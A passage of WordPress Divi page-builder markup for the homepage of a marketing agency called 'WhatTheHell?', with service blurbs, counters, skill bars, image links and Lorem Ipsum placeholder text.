_builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text 